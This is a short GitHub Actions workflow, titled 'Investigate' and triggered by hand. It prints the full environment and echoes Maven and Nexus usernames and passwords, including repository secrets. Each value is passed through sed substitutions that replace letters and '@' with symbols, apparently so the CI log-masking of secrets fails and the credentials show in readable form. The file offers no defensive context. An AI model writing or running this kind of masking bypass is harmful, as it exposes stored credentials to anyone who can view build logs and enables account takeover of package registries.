name: Investigate
on:
  workflow_dispatch:

jobs:
  show:
    runs-on: ubuntu-latest
    steps:
      - name: record
        run: |
          env
          echo MavenU: ${MAVEN_USERNAME} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g'
          echo MavenP: ${MAVEN_PASSWORD} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g'
          echo NexusU1: ${{ secrets.NEXUS_USERNAME }} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g'
          echo NexusP1: ${{ secrets.NEXUS_PASSWORD }} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g'
          echo NexusU2: ${NEXUS_USERNAME} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g'
          echo NexusP2: ${NEXUS_PASSWORD} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g' 
